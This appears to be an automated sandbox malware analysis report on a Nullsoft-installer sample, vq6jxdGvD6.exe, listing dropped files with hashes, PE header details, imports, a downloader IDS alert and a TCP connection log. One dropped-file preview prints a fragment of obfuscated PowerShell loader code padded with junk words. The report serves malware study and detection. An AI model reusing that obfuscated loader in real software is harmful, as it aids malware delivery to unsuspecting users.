Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.6614996787412575
Encrypted:	false
SSDEEP:	48:qYGZ0Gtq/oaPybCQ1hsIqXA1AfsgsfbLwGXwaEvRugYy/ImBmrm:wDAoyXAykgEUGAaGRuRm
MD5:	245AC30568C8703531FC4E64B321BE16
SHA1:	BADD01A31FC2B8CC050A1DC3489FC8F620C450F7
SHA-256:	B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
SHA-512:	9A81F2DE2CC41F6E35498B04B6327ADCFF268523F7B6A9EA9D5CFA1B2CF0425E59A121C99F0A0251C3380886CC058E88DE8A12B17E049D5FD5D7EEB0C956F083
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: AwMu7gR48D.exe, Detection: malicious, Browse Filename: beNxougDFV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.............................. ......0#......Rich............................PE..L.....uY...........!......................... ...............................P......................................."..h...l ..<............................@....................................................... ..l............................text...g........................... ..`.rdata..(.... ......................@..@.data...<....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.286321681873388
Encrypted:	false
SSDEEP:	48:qK64n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSC15gaoFU:5P4ZxKQruHkJwvcVyV4FU
MD5:	200E4D67E7A08D4C92F05E31442095FE
SHA1:	1D0492FDFB7C0C8799AEA7982DA8B4EFEDE7581B
SHA-256:	01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E
SHA-512:	620AB7A94E4EE965C159CC1A5F2ADC2CC6616CFB738EA191EAB404B249D21DD19134A314A21315F4EE2C0A75FD5062D1BF353BB75B877A61171F27F4A87CF995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: AwMu7gR48D.exe, Detection: malicious, Browse Filename: beNxougDFV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....uY...........!................i........ ...............................P...................................... "......L ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...x....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	ASCII text, with very long lines (3209), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53118
Entropy (8bit):	5.294783998840152
Encrypted:	false
SSDEEP:	1536:WW6HD/bs2eQI/pkQmWh6DXWR8LmECTwhrX3:I8vQICg8DG8Lswhz3
MD5:	ED0BE426D7F345AB4947B5F655109469
SHA1:	13512380338898A2B97D53BBB082D3996ACDD165
SHA-256:	058E3810485E33FD70688F0A759DAD617C834B4EA9FB03203FB03E70BC457DD5
SHA-512:	7BC4993A6C73F3ED9895A9A6C1FE89F07DFB1FE6423CBDBC20712410EA34298FF33D4622975254C7F0F164CE41140E28AC186488A997183DEA68127270021B56
Malicious:	true
Preview:	$Leddelseste=$Noncanonizations;..<#Undershire Mestervrkerne Afterwise Fryserummenes Irresiliency #>..<#Claustrum Smidighedernes Paradigmaets Opskruendes Pleionian Terminaltypers Bankkontoen #>..<#Splendaceous Produktforretningernes Shoppingerne #>..<#Schlep Arbejdsorganiseringen Mindretalsstyrets #>..<#Minutissimic Cordaitalean Sastrugi #>..<#stangspringet hjemmebrndinger Minirecessions Establismentarian #>...$Elinguating = @'.Undis.sterl$Sv,geLAffoleOouascServoh TureeskimosJorde=Un ef$Uns gKAutaroWeld oCatelmArvelkVarnyi,ignoeDaady;U,pul.E,klkfM,rgiuReglenEnduecU tratKhalsiS lleoSkrivn F.gu ,ypndSwaddeBathybp,rierdatadiShystd V riiPerchngita gFlad H mne(Insti$ VensNFladteYeastnRattlnIllauaHalmv,H ppe$Tran.HUnhe e Distl RomasDo.ogsVerbat antheB,strrBunineTreernUrteasradio) Pigd Inds{Genpa. Exig.merri$ a edSPreoep Tropi Bengn xyged AngelKh rweBanegtHnsegaS usdi D sblF ien Unsec(s,alaDHypokyHj vavBlndvlIntere Be arSuddys Milj Lut,o' Non Over Deka o unfenPhytoiFianc$JubilUArbejdMetro

C:\Users\user\AppData\Local\unshabbily\Polarklimas.Und

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	data
Category:	dropped
Size (bytes):	305040
Entropy (8bit):	7.752588620195964
Encrypted:	false
SSDEEP:	6144:NLUTHbbk51sErm7r29nJvvCMwEjgOwzK8p8OkOp/xGh:eTPk5qEa+9JiMzfvY8
MD5:	C6F834D7CFC7F5A209CF378D373BB187
SHA1:	8797CE69F9886960E98DAD821CBAE4BB8EFEAED1
SHA-256:	CD83E5873DEE14428796CC97360D9CCFCED1CDE89EA58F26D7DB31C346ED2DCB
SHA-512:	8FAF0AB0B5CF72B21AF93AF87DA3E5B62105D6DC4A60E4768AFE9D472C432D46A6F0C01F586B1E4AA9908ED7014CA81125ADE257DC8946A45BD77AAD8D530759
Malicious:	false
Preview:	......2.X...#..$.KK...........................TTT...d......~........'''.kk.T..y....N.`..C....XXX.5.v.......8...........$$$$$....=......-..................".Z.......h.-..7.....>....=.....II..<.{.L..............8.................C.................x.................TTTT.....\\..................................................x.....k............X...u.O....444.....&...............ZZZZZ.............M..^^.........K.X......................ee.......................................}.........j...G......m..........<<.,,....444........,..........%..........Y..............T.......;......vv......}}}}}...................9999....nnnnn.UU...........$$..........kkk.........p......................"".........]].BBB.aaaaa..(......mm.q.A...__..............$....<<.666.........H.....I............%%%.@.....3......\|\|............cccc..............((........WW.....$$...............666..........\\. ............w................//....V........e.........PPPP...M...n...........S..L..u...............!!....I........qq.

C:\Users\user\AppData\Local\unshabbily\Toral\irresolubleness.hje

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 164
Category:	dropped
Size (bytes):	4242
Entropy (8bit):	1.1689000520156396
Encrypted:	false
SSDEEP:	24:3X9EQjC0f2xlR8XA8f+6mqZVN//sTqYiegGDXMTTO1zlvyQ:nbpexne/+UfNXsNiSCTOPvh
MD5:	7F09DBB1E7A421C1C43B98C594A1F1EE
SHA1:	5E541763EFD79D7005668B908BE438412E042CBD
SHA-256:	20F7314F0A64579C20FFBAC8DE67F9D36FD4824F5C64DC01D89F5FF4908BCDC5
SHA-512:	B901933CD173EDC42828FCC6CCA5B4A4BC29FD0F0ADD0AE08BE56BBF1D24781C542C8CE99142069287C976F6E8059D5ACD95FEA8D54427D9B02F74765352AAF5
Malicious:	false
Preview:	.......................%............................................................U............W......Z.............;.................Q...........................s.......................................E.............................................z...............................M..........P...................................<........u.............................w................c.........................................I...................................k........?................................}.................$..................'..=2.......G..h...?.....................................................................\|................................................ ............hj..............................................-............+...................................R....h.........................._.!....R........................".................................Q&<...............................J........N.......................................d..........................5

C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	509826
Entropy (8bit):	7.642261018764836
Encrypted:	false
SSDEEP:	12288:SpC1XwRRXodkuFqzPksPK3pCaCn3/h/0x1Odt3xW:eC1ORXohFq3wpCau32M4
MD5:	05F87E600088108EEC219530590649BD
SHA1:	C47B8AD894BFFCF29539AB9F9FF1D578804BA0BE
SHA-256:	F413458062741D65426D5191E98205F507572BAEF3D31C94C550A66FB888A6BA
SHA-512:	277D6A5F62563E9949C2269C84B8FF491213AE24E814E8B9034AA8DD45A5405705B7D9FF57C4DAAB89BE05FE2CB1B2A3E9336E90FCB3F43648F2E3B0B3F0897F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L...#.uY.................`...........1.......p....@.......................................@.................................(t.......0...W...........................................................................p...............................text....^.......`.................. ..`.rdata..H....p.......d..............@..@.data................x..............@....ndata.......@...........................rsrc....W...0...X...\|..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\unshabbily\dicyclopentadienyliron.skr

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	data
Category:	dropped
Size (bytes):	134563
Entropy (8bit):	1.2420304589895552
Encrypted:	false
SSDEEP:	768:JTXI/LYa4cD2ujQzIsqIoMEJ8owrALEXMFrDwh0aHlC++KDTvfO/Ky:EnVS+r9brkwN/
MD5:	E6066CC79780E021C55CDC3EF8FC82CC
SHA1:	FADDF02F672BEA8C3A766FB42F1FDC365934ED50
SHA-256:	ED56062F4EA903C040602E4F50BB0F88A5E5DAC8F9F50A608D0495347C1003B8
SHA-512:	1F856CE5664BA5BC3914ACE73BDF0F0EBD419A5162890F9E7F66A9878DA9ACDDE9E24A42DDCE4ADAC7014F41F4C54977D9754DC867A9570B6A7BCAB757FC53F7
Malicious:	false
Preview:	...................................~.................j.....................................................q-....................................................................M................n..O%....H............................4..=......................z..................j.............................................'..............T.M..............!.................................................................................x.....................{..............R..............................................&..........h..............0...............................................................D...................................................................................................................................(..........................................................................E...........`.....=......................n.............................!...g................................#.........................................................................

C:\Users\user\AppData\Local\unshabbily\fjernkontrollers.hid

Download File

Process:	C:\Users\user\Desktop\vq6jxdGvD6.exe
File Type:	data
Category:	dropped
Size (bytes):	347357
Entropy (8bit):	1.2510537828861161
Encrypted:	false
SSDEEP:	768:7wNmQThgiCB7GJHZUFVJPaSenNvSIpJjRuermO9c3NMRzgJrawa1+VWzoIk33SnI:Agcs7GTR7EvgE
MD5:	10C53FA2ADD5E04A7C257241470F8B30
SHA1:	F280F7414C749DA2A84EAC4DF1AD18B623325CF8
SHA-256:	E27733521BB45F4719C1FFFB5D0D9262E8BAA510C52E7EC880612464E5889685
SHA-512:	CF23EA9FB2316C67A1AAA7DCEFD48728F9DBC17E2413867EBFEB443F2EE7CF0BCFCF00F2FAF094A56779FEAE27D14E7408D629E0DF4EF7A8D2CF4FAFA1EBF2D0
Malicious:	false
Preview:	.........[......*....................................................`..........x.......................................#......A..........................................t....................&.....................y...............................................................................................................................h...............K.........................................................................s......................S.........................n.....`...................................................................................J..a.............;.........................x.....................e.........6.....................?.......................................................U.....c.......................A...........................................................\|..............................................=............................L...........p..f.......]..................E................................................................v...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.642261018764836
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vq6jxdGvD6.exe
File size:	509'826 bytes
MD5:	05f87e600088108eec219530590649bd
SHA1:	c47b8ad894bffcf29539ab9f9ff1d578804ba0be
SHA256:	f413458062741d65426d5191e98205f507572baef3d31c94c550a66fb888a6ba
SHA512:	277d6a5f62563e9949c2269c84b8ff491213ae24e814e8b9034aa8dd45a5405705b7d9ff57c4daab89be05fe2cb1b2a3e9336e90fcb3f43648f2e3b0b3f0897f
SSDEEP:	12288:SpC1XwRRXodkuFqzPksPK3pCaCn3/h/0x1Odt3xW:eC1ORXohFq3wpCau32M4
TLSH:	B3B41290B744A4F2C83A43B5B6B38C712D217E6B8375127B775433AE2476273190BA9F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...#.uY.................`.........

File Icon


Icon Hash:	246445471b4f0f1f

Static PE Info

General

Entrypoint:	0x4031bb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759523 [Mon Jul 24 06:35:15 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A0h]
call dword ptr [0040709Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042370Ch], eax
je 00007F2720C81BC3h
push ebx
call 00007F2720C84C7Ah
cmp eax, ebx
je 00007F2720C81BB9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F2720C84BF6h
push esi
call dword ptr [00407098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F2720C81B9Dh
push 0000000Ah
call 00007F2720C84C4Eh
push 00000008h
call 00007F2720C84C47h
push 00000006h
mov dword ptr [00423704h], eax
call 00007F2720C84C3Bh
cmp eax, ebx
je 00007F2720C81BC1h
push 0000001Eh
call eax
test eax, eax
je 00007F2720C81BB9h
or byte ptr [0042370Fh], 00000040h
push ebp
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407178h]
push 00409188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33000	0x15788	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ed2	0x6000	9112619c91f32f6f8e4096e108712ebe	False	0.6629638671875	data	6.442176588686321	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1248	0x1400	1c9a524313c13059919ecf8195d205be	False	0.4275390625	data	5.007650149182371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	458aeaedc3eabb1f26ec1bbd666017ae	False	0.6396484375	data	5.13585559284969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0xf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33000	0x15788	0x15800	40497017b2a1d5e01ad2b917ac12d1eb	False	0.2589821039244186	data	4.486367209516884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x332c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.21990713356204897
RT_ICON	0x43af0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.35072614107883815
RT_ICON	0x46098	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.39094746716697937
RT_ICON	0x47140	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.48811475409836064
RT_ICON	0x47ac8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5523049645390071
RT_DIALOG	0x47f30	0x100	data	English	United States	0.5234375
RT_DIALOG	0x48030	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x48150	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x48218	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x48278	0x4c	data	English	United States	0.8157894736842105
RT_VERSION	0x482c8	0x180	data	English	United States	0.5859375
RT_MANIFEST	0x48448	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T15:45:07.491739+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	57058	142.250.184.238	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:44:31.569890976 CET	56991	53	192.168.2.6	162.159.36.2
Jan 10, 2025 15:44:31.574683905 CET	53	56991	162.159.36.2	192.168.2.6
Jan 10, 2025 15:44:31.574803114 CET	56991	53	192.168.2.6	162.159.36.2
Jan 10, 2025 15:44:31.579982996 CET	53	56991	162.159.36.2	192.168.2.6
Jan 10, 2025 15:44:32.061408043 CET	56991	53	192.168.2.6	162.159.36.2
Jan 10, 2025 15:44:32.100507021 CET	56991	53	192.168.2.6	162.159.36.2
Jan 10, 2025 15:44:32.105473042 CET	53	56991	162.159.36.2	192.168.2.6
Jan 10, 2025 15:44:32.105531931 CET	56991	53	192.168.2.6	162.159.36.2
Jan 10, 2025 15:45:06.425806046 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:06.425843000 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:06.425945044 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:06.436496973 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:06.436512947 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.098027945 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.098176956 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.098777056 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.098838091 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.157253027 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.157277107 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.157598972 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.159377098 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.162467957 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.203322887 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.491745949 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.491822958 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.491969109 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.492062092 CET	443	57058	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:07.492116928 CET	57058	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:07.528413057 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:07.528445005 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:07.528635025 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:07.528856993 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:07.528872013 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.162455082 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.162992954 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.166616917 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.166624069 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.166871071 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.166929007 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.167301893 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.207334042 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.610554934 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.610579967 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.610945940 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.610953093 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.610999107 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.611073971 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.611110926 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.611119986 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.611205101 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.622492075 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.622514963 CET	443	57059	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:08.622620106 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.622620106 CET	57059	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:08.750931978 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:08.750974894 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:08.751063108 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:08.751283884 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:08.751293898 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.401495934 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.401774883 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.402138948 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.402209997 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.403719902 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.403724909 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.403925896 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.403980017 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.404450893 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.447335005 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.787838936 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.787909985 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.787926912 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.787972927 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.788019896 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.788050890 CET	443	57060	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:09.788103104 CET	57060	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:09.809009075 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:09.809067011 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:09.809137106 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:09.809540987 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:09.809560061 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.445664883 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.445791960 CET	57061	443	192.168.2.6	142.250.185.65
